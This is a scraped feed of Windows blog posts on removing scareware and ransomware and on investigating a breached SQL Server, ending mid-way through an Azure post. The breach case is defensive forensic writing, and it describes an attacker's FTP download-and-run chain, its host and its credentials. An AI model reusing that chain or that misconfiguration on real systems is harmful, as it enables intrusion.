Windows Blog Archive articles https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/bg-p/Windows-Blog-Archive Windows Blog Archive articles Mon, 25 Oct 2021 14:03:48 GMT Windows-Blog-Archive 2021-10-25T14:03:48Z The Case of the Father-in-Law’s Scareware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-father-in-law-8217-s-scareware/ba-p/724376 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 18, 2015 </STRONG> <BR /> <P> We all know people, friends and family, that have fallen for the “your system is infected, press here to get protected” scams that are becoming even more common since I first wrote about them in my The Antispyware Conspiracy blog post in 2005. </P> <P> <IMG alt="image" border="0" height="373" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2437.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121446i45AEFF8571967D89" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <P> </P> <P> <IMG alt="image" border="0" height="403" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8787.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121447i83C3EAE93A05E205" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <P> </P> <P> </P> <P> <IMG alt="image" border="0" height="226" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0361.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121448i241550AA980B62F2" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="554" /> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:31:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-father-in-law-8217-s-scareware/ba-p/724376 MarkRussinovich 2019-06-27T07:31:15Z Hunting Down and Killing Ransomware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/hunting-down-and-killing-ransomware/ba-p/724372 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 02, 2013 </STRONG> <BR /> <P> Scareware, a type of malware that mimics antimalware software, has been around for a decade and shows no sign of going away. The goal of scareware is to fool a user into thinking that their computer is heavily infected with malware and the most convenient way to clean the system is to pay for the full version of the scareware software that graciously brought the infection to their attention. I wrote about it back in 2006 in my <A href="#" target="_blank"> The Antispyware Conspiracy </A> blog post, and the fake antimalware of today doesn’t look much different than it did back then, often delivered as kits that franchisees can skin with their own logos and themes. There’s even one labeled Sysinternals Antivirus: </P> <P> <IMG alt="image" border="0" height="345" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7776.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121433i77D9008F9BFE2B20" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> A change that’s been occurring in the scareware industry over the last few years is that most scareware today also classifies as ransomware. The examples in my 2006 blog post merely nagged you that your system was infected, but otherwise let you continue to use the computer. Today’s scareware prevents you from running security and diagnostic software at the minimum, and often prevents you from executing any software at all. Without advanced malware cleaning skills, a system infected with ransomware is usable only to give in to the blackmailer’s demands to pay. </P> <P> In this blog post I describe how different variants of ransomware lock the user out of their computer, how they persist across reboots, and how you can use <A href="#" target="_blank"> Sysinternals Autoruns </A> to hunt down and kill most current ransomware variants from an infected system. </P> <H3> The Prey </H3> <P> Before you can hunt effectively, you must first understand your prey. Fake-antimalware-type scareware, by far the most common type of ransomware, usually aims at being constantly annoying rather than completely locking a user out of their system. The prevalent strains use built-in lists of executables to determine what that they will block, which usually includes most antimalware and even the primary Sysinternals tools. They customarily let the user run most built-in software like Paint, but sometimes will block some of those. When they block an executable they display a dialog falsely claiming that it was blocked because of an infection: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5381.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121434i15574C0F92F71854" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> But malware has gotten even more aggressive in the last couple of years, not even pretending to be anything other than the ransomware that they are. Take this example, which completely takes over a computer, blocking all access to anything except its own window, and demands an unlock code to regain the use of the system that the user must purchase by calling the number specified (in this case one with a Russian country code) : </P> <P> <IMG alt="image" border="0" height="297" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3666.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121435i13225AF8A34D5DC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here’s one that similarly takes over the computer, but forces the user to do some online shopping to redeem the computer’s use (I haven’t investigated to see what amount of purchasing returns the use of the computer): </P> <P> <IMG alt="image" border="0" height="323" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7853.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121436i1C91DA139599B65F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here’s one that I suppose can also be called scareware, because it informs the user that their system harbors child pornography, something that would be horrifying news to most people. The distributor must believe that the fear of having to defend against charges of child pornography will dissuade victims from going to the authorities and convince them to instead pay the requested fee. </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7357.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121437i352451993875B421" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Some ransomware goes so far as to present itself as official government software. Here’s one supposedly from the French police that informs users that pirated movies reside on their computer and they must pay a fine as punishment: </P> <P> <IMG alt="image" border="0" height="423" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3666.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121438i1B9EF2A60D91EAD2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> As far as how these malefactors lock users out of their computer, there are many different techniques in practice. One commonly used by the fake-antimalware variety, like the Security Shield malware shown in an earlier screenshot, is to block the execution of other programs by simply watching for the appearance of new windows and forcibly terminating the owning process. Another technique, used by the online shopping ransomware example pictured above, is to hide any windows not belonging to the malware, thus technically enabling you to launch other software but not to interact with it. A similar approach is for malware to create a full-screen window and to constantly raise the window to the top of the window order, obscuring all other application windows behind it. I’ve also seen more devious tricks, like one sample that creates a new desktop and switches to it, similar to the way <A href="#" target="_blank"> Sysinternals Desktops </A> works – but while your programs are still running, you can’t switch to their desktop to interact with them. </P> <H3> Finding a Position from Which to Hunt </H3> <P> The first step for cleaning a system of the tenacious grip of ransomware is to find a place from which to perform the cleaning. All of the lock-out techniques make it impossible to interact with a system from the infected account, which is typically its primary administrative account. If the victim system has another administrative account and the malware hasn’t hijacked a global autostart location that infects all accounts, then you’ve gotten lucky and can clean from there. </P> <P> Unfortunately, most systems only have one administrative account, removing the alternate account option. The fallback is to try <A href="#" target="_blank"> <EM> Safe Mode </EM> </A> , which you can reach by typing F8 during the boot process (reaching <EM> Safe Mode </EM> is a little more difficult <A href="#" target="_blank"> in Windows 8 </A> ). Most ransomware configures itself to automatically start by creating an entry in the Run or RunOnce key of HKCU\Software\Microsoft\Windows\CurrentVersion (or the HKLM variants), which Safe Mode doesn’t process, so Safe Mode can provide an effective platform from which to clean such malware. A growing number of ransomware samples modify HKCU\Software\Microsoft\Window NT\CurrentVersion\Winlogon\Shell (or the HKLM location), however, which both <EM> Safe Mode </EM> and <EM> Safe with Networking </EM> execute. <EM> Safe Mode with Command Prompt </EM> overrides the registry shell selection, so it circumvents the startup of the majority of today’s ransomware and is the next fallback position: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4721.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121439i18986531D2B4CD0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Finally, if the malware is active even in <EM> Safe Mode with Command Prompt </EM> , you’ll have no choice but to go offline hunting in an alternate Windows installation. There are a number of options available. If you have Windows 8, creating a <A href="#" target="_blank"> Windows 8 To Go </A> installation is ideal, since it is literally a full version of Windows. An alternative is to boot the Windows Setup media and type Shift+F10 to open a command-prompt when you reach the first graphical screen: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4214.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121440i74429597082F9879" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> You won’t have access to Internet Explorer and many applications won’t work properly in Windows Setup’s stripped-down environment, but you can run many of the Sysinternals tools. Finally, you can create a <A href="#" target="_blank"> Windows Preinstallation Environment </A> (WinPE) boot media, which is an environment similar to that of Windows Setup and something that <A href="#" target="_blank"> Microsoft Diagnostic and Repair Tooltkit </A> (MSDaRT) uses. </P> <H3> The Hunt </H3> <P> Now that you’ve found your hunting spot, it’s time to select your weapon. The easiest to use is of course off-the-shelf antimalware software. If you’re logged in to an alternate account or <EM> Safe Mode </EM> you can use standard online-scanning products, many of which are free, like Microsoft’s own <A href="#" target="_blank"> Windows Defender </A> . If you’re booted into a different Windows installation, however, then you’ll need to use an offline scanner, like <A href="#" target="_blank"> Windows Defender Offline </A> . If the antimalware engine isn’t able to detect or clean the infection, you’ll have to turn to more a more precise and manual weapon. </P> <P> One utility that enables you to rip the malware’s tendrils off the system is <A href="#" target="_blank"> Sysinternals Autoruns </A> . Autoruns is aware of over a hundred places where malware can configure itself to automatically start when Windows boots, a user logs in, or a specific built-in application launches. The way you need to run it depends on what environment you’re hunting from, but in all cases you should run it with administrative rights. Also, Autoruns automatically starts scanning when you start it; you should abort the initial scan by pressing the Esc key, then open the Filter dialog and select the options to verify signatures and to hide all Microsoft entries so that malware will appear more prominently, and restart the scan: </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8422.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121441i349C44D7E7474BB3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="305" /> </P> <P> If you’re logged into a different account from the one that’s infected, then you need to point Autoruns at the infected account by selecting it from the User menu. In this example Autoruns is running in the Fred account, but the one that’s infected is Abby, so I’ve selected the Abby profile: </P> <P> <IMG alt="image" border="0" height="172" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3644.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121442i3BCFA6D31D4F8FAC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="306" /> </P> <P> If you’ve booted into a different operating system then you need to use Autoruns offline support, which requires you to specify the root of the target Windows installation and the target user profile. Open the Analyze Offline System dialog from the File menu and enter the appropriate directories: </P> <P> <IMG alt="image" border="0" height="241" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3124.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121443iAEF57FA9A265380F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="370" /> </P> <P> After Autoruns has scanned the system, you have to spot the malware. As I explain in my <A href="#" target="_blank"> Malware Hunting with the Sysinternals Tools </A> presentations, malware often exhibits the following characteristics: </P> <P> <IMG alt="image" border="0" height="323" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7853.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121444i86F58D5F007B22C2" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Of course, since Autoruns just shows autostart configuration and not running processes, some of these attributes are not relevant. Nevertheless, I’ve found in my examination of several dozen variants of current ransomware that all of them of them satisfy more than one, most commonly by not having a description or company name and having a random or suspicious file name. </P> <P> One downside to offline scanning is that signature verification doesn’t work properly. This is because Windows uses catalog signing, as opposed to direct image signing, where it stores signatures in separate files rather than in the images themselves. Autoruns doesn’t process offline catalog files (I’ll probably add that support in the near future), so all catalog-signed images will show up as unverified and highlighted in red.&nbsp; Since most malware doesn’t pretend to be from Microsoft, you can try an initial scan with the option to verify code signatures unchecked. Here’s the result of an offline scan with signature verification disabled of a ransomware infection that takes over two autostart locations - see if you can spot them: </P> <P> <IMG alt="image" border="0" height="254" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7455.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121445i2C24230C86A3BD7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> If you are unsure about an image, you can try uploading it to Virustotal.com for analysis by around 40 of the most popular antivirus engines, searching the Web for information, and looking at the strings embedded in the file using the <A href="#" target="_blank"> Sysinternals Strings </A> utility. </P> <H3> The Kill </H3> <P> Once you’ve determined which entries belong to malware, the next step is to disable them by deselecting the checkboxes of their autostart entries. This will allow you to re-enable the entries later if you discover you made a mistake. It doesn’t hurt to also move the malware files and any other suspicious files in the directory of the ones configured to autostart to another directory. Moving all&nbsp; the files makes it more likely that you’ll break the malware even if you miss an autostart location. </P> <P> Next, check to see if your prey is dead by booting the system and logging into the account that was infected. If you still see signs of an infection, you might have missed something in your Autoruns analysis, so repeat the steps. If that doesn’t yield success, the malware may be a more sophisticated strain, for example one that infects the Master Boot Record or that infects the system in some other unconventional way to persist across reboots. There is also ransomware that goes further and encrypts files, but they are relatively rare. Fortunately, ransomware authors are lazy and generally don’t need to go to such extents to be effective, so a quick analysis with Autoruns is virtually always lethal. </P> <P> Happy hunting! </P> <P> <EM> If you liked this post, you’ll like my two highly-acclaimed cyberthriller novels, Zero Day and Trojan Horse. Watch their exciting video trailers, read sample chapters and find ordering information on my personal site at </EM> <A href="#" target="_blank"> <EM> http://russinovich.com </EM> </A> </P> </BODY></HTML> Thu, 27 Jun 2019 07:30:48 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/hunting-down-and-killing-ransomware/ba-p/724372 MarkRussinovich 2019-06-27T07:30:48Z The Case of the Unexplained FTP Connections https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexplained-ftp-connections/ba-p/724355 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 28, 2012 </STRONG> <BR /> <P> A key part of any cybersecurity plan is “continuous monitoring”, or enabling auditing and monitoring throughout a network environment and configuring automated analysis of the resulting logs to identify anomalous behaviors that merit investigation. This is part of the new “assumed breach” mentality that recognizes no system is 100% secure. Unfortunately, the company at the heart of this case didn’t have a comprehensive monitoring system, so had been breached for some time before updated antimalware signatures cleaned their infection and brought the breach to their attention. Besides highlighting just how weak cybersecurity is at many companies, this case highlights the use of several <A href="#" target="_blank"> Sysinternals Process Monitor </A> features, including the Process Tree dialog and one feature many people aren’t aware of, Process Monitor’s ability to monitor network activity. </P> <P> The case opened when a network administrator at a South African company contacted Microsoft Services Premier Support and reported that their corporate Exchange server, running on Windows Server 2008 R2, appeared to be making outbound FTP connections. They noticed this only because the company’s installation of Microsoft Forefront Endpoint Protection (FEP) alerted them that it had cleaned a piece of malware it found on the server. Concerned that their network might still be compromised despite the fact that FEP claimed the system was malware-free, he examined the company’s perimeter firewall logs. To his horror, he discovered FTP connections that numbered in the hundreds per day and dated back several weeks. Instead of attempting a forensic examination on his own, he called on Microsoft’s security consulting team, which specializes in helping customers clean up after an attack. </P> <P> The Microsoft support engineer assigned the case began by capturing a five-minute Process Monitor trace of the Exchange server. After stopping the trace he opened the Process Tree dialog (under the Tools menu), which shows the parent-child relationships of all the processes that existed at any point in the current trace. He quickly found that around 20 FTP processes had been launched during the collection, each of them short-lived, except for one, which was still active (process 7324 below): </P> <P> <IMG alt="image" border="0" height="291" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4118.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121420i1AF99FFEC80FB95C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="436" /> </P> <P> The engineer looked at the command lines for the FTP processes by selecting them in the tree so that their details appeared at the bottom of the Process Tree dialog. The command lines for the half of them bizarrely included just the “-?” argument, which simply brings up FTP help: </P> <P> <IMG alt="image" border="0" height="107" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4405.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121421i1990B3F285071005" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="234" /> </P> <P> The other half were more interesting, including “-i” and “-s” switches: </P> <P> <IMG alt="image" border="0" height="93" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6560.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121422i252ABD4CF8A5EAD7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="241" /> </P> <P> The –i switch has FTP turn off prompting for multiple file transfers, and –s directs FTP to execute the FTP commands listed in a file, in this case a file named “j”.&nbsp; Setting out to find out what file '”j” contained, he clicked on the “Include Process” button at the bottom of the Process Tree dialog so that he could find the process’s file events: </P> <P> <IMG alt="image" border="0" height="40" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4186.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121423i1774616006629674" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="325" /> </P> <P> He searched the resulting filtered trace for “j” and found the file’s location in several of the events: </P> <P> <IMG alt="image" border="0" height="85" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5460.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121424i15E2549820E46FC4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="461" /> </P> <P> He navigated to the C:\Windows\System32\i4333 directory, but the “j” file was gone. That being a dead end, he turned his attention to the FTP process’s parent, Cmd.exe, and looked at its command line. The line was too long and convoluted to easily understand: </P> <P> <IMG alt="image" border="0" height="65" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1738.image_5F00_thumb_5F00_31F8EA0B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121425iBDD2DD402AED8DA1" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> He selected it, typed Ctrl+C to copy it to the clipboard, pasted it into Notepad, and decomposed it into its constituent components, each of which was separated by a “&amp;”. The result looked like this: </P> <P> <IMG alt="SNAGHTML143cd3bc" border="0" height="225" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8780.SNAGHTML143cd3bc_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121426iA0AA0C104F013EE7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML143cd3bc" width="454" /> </P> <P> The first instruction has the command prompt create a directory named i4333 and then start creating the contents of the “j” file. The commands it writes into “j” instruct FTP to connect to NUXZb.in.into4.info, login with the user name “New” and the password “123”, then download all the files on the FTP server that end with “.exe”. After FTP has processed the file, the command prompt deletes “j” and then creates a batch file that executes the downloaded files, first using the Shell to launch them (“start”) and then the Command Prompt. </P> <P> A quick detour to Whois showed the engineer that the NUXZb hostname was issued by Protected Name Services and didn’t reveal any useful information. The engineer toggled off Process Monitor’s network name resolution and found the outbound FTP connection in the trace to see the IP address the name had resolved to: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2843.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121427iC8E98220F95B1871" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="513" /> </P> <P> An IP address location lookup on the Web pinpointed the IP address at an ISP in Chicago (the name now resolves to a different IP address), so he concluded the connection was to a server that was also compromised or one the attacker had hosted at the ISP. Finished analyzing the command line, he looked at the contents of the resulting script, D.bat, which was still in the directory and contained this single command: </P> <P> <IMG alt="image" border="0" height="35" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3326.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121428i531801D456DEE1FA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="324" /> </P> <P> Not coincidentally, 134.exe was the executable Forefront had flagged as a remote access Trojan (RAT) in the alerts that the administrator first responded to. The script could therefore not find it, making it seem that the attack – or at least this part of it - had been neutralized by FEP. It also implied that the attack was automated and stuck in a loop trying to activate. </P> <P> The engineer next set out to determine how the command-prompt processes were being launched. Looking at their parent processes in the process tree, he learned they were all launched from Sqlserver.exe: </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4503.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121429iEF16E20A9AF2259F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> This obviously wasn’t a good sign, but it wasn’t the worst of it: examining SQL Server’s network activity in the trace, he saw many incoming connections: </P> <P> <IMG alt="image" border="0" height="327" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1263.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121430i808D0535DFE6A09F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Lookups of the IP address locations placed them in China, Tunisia, Taiwan, and Morocco: </P> <P> <IMG alt="image" border="0" height="366" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8765.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121431iCCA68B480471A736" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The SQL Server was being used by an attacker or multiple attackers from around the world in countries known for being cybercriminal safe havens. It was clearly time to flatten the server, but before calling the administrator to give him the bad news and advise him to immediately disconnect the server from the network, he thought he’d spend a few minutes examining the security of the SQL Server. Understanding what had led to the compromise could help the company avoid being compromised the same way again. </P> <P> He launched a Microsoft support batch file that checks various SQL Server security settings. The tool ran for a few seconds and then printed its discouraging results: the server had an administrator account with a blank password, was configured for mixed-mode authentication, and allowed stored procedures to launch command prompts via the enablement of the “xp_cmdshell” feature: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4478.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121432i99DE4CD63B4C805F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> That meant that anyone on the Internet could logon to the server without a password and execute executables – like FTP – to infect the system with their own tools. </P> <P> With the help of Process Monitor and some discussion with the company’s administrator, the support engineer had a solid theory for what had happened: an administrator at the company had installed SQL Server on the company’s Exchange server several weeks prior to the incident. Not realizing the server was on the perimeter, they had opened the SQL Server’s port in the local firewall, left it with a blank admin account, and enabled xp_cmdshell. It goes without saying that even if the server wasn’t on the Internet, that configuration leaves a server without any network security. Not long after, automated malware scanning the Internet for exposed targets had stumbled across the open SQL port, infected the server with malware, and likely enlisted it in a Botnet. FEP signatures for the new malware variant were delivered to the server some time later and removed the infection. The Botnet-enlisting malware was still trying to reintegrate the server when the case with Microsoft support was opened. While the company can’t know how much – if any – of its corporate data was pilfered during the infection, this was a very loud and clear wakeup call. </P> <P> You can test your own cybersecurity knowledge by taking my <A href="#" target="_blank"> Operation Desolation cybersecurity quiz </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:29:14 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unexplained-ftp-connections/ba-p/724355 MarkRussinovich 2019-06-27T07:29:14Z Windows Azure Host Updates: Why, When, and How https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-azure-host-updates-why-when-and-how/ba-p/724308 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 22, 2012 </STRONG> <BR /> <P> </P> <P> Windows Azure’s compute platform, which includes Web Roles, Worker Roles, and Virtual Machines, is based on machine virtualization. It’s the deep access to the underlying operating system that makes Windows Azure’s Platform-as-a-Service (PaaS) uniquely compatible with many existing software components, runtimes and languages, and of course, without that deep access – including the ability to bring your own operating system images – Windows Azure’s Virtual Machines couldn’t be classified as Infrastructure-as-a-Service (IaaS). </P> <H3> The Host OS and Host Agent </H3> <P> Machine virtualization of course means that your code - whether it’s deployed in a PaaS Worker Role or an IaaS Virtual Machine - executes in a Windows Server hyper-v virtual machine. Every Windows Azure server (also called a Physical Node or Host) hosts one or more virtual machines, called “instances”, scheduling them on physical CPU cores, assigning them dedicated RAM, and granting and controlling access to local disk and network I/O. </P> <P> The diagram below shows a simplified view of a server’s software architecture. The host partition (also called the root partition) runs the Server Core profile of Windows Server as the host OS and you can see the only difference between the diagram and a standard Hyper-V architecture diagram is the presence of the Windows Azure Fabric Controller (FC) host agent (HA) in the host partition and the Guest Agents (GA) in the guest partitions. The FC is the brain of the Windows Azure compute platform and the HA is its proxy, integrating servers into the platform so that the FC can deploy, monitor and manage the virtual machines that define Windows Azure Cloud Services. Only PaaS roles have GAs, which are the FC’s proxy for providing runtime support for and monitoring the health of the roles. </P> <P> <IMG alt="image" border="0" height="203" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5241.image_5F00_thumb_5F00_530F879B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121414iCF2A06B620962D3A" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="522" /> </P> <H3> Reasons for Host Updates </H3> <P> Ensuring that Windows Azure provides a reliable, efficient and secure platform for applications requires patching the host OS and HA with security, reliability and performance updates. As you would guess based on how often your own installations of Windows get rebooted by Windows Update, we deploy updates to the host OS approximately once per month. The HA consists of multiple subcomponents, such as the Network Agent (NA) that manages virtual machine VLANs and the Virtual Machine virtual disk driver that connects Virtual Machine disks to the blobs containing their data in Windows Azure Storage. We therefore update the HA and its subcomponents at different intervals, depending on when a fix or new functionality is ready. </P> <P> The steps we can take to deploy an update depend on the type of update. For example, almost all HA-related updates apply without rebooting the server. Windows OS updates, though, almost always have at least one patch, and usually several, that necessitate a reboot. We therefore have the FC “stage” a new version of the 